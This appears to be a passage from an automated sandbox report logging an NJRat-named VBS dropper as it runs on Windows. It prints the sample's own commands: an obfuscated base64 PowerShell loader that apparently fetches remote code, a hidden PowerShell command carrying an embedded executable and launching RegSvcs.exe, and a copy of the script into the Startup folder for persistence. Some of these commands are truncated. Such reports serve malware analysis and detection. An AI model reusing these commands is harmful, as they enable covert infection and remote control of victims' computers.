Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')

Source: RegSvcs.exe, 00000016.00000002.803703549.00000000032F1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: Program Manager

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
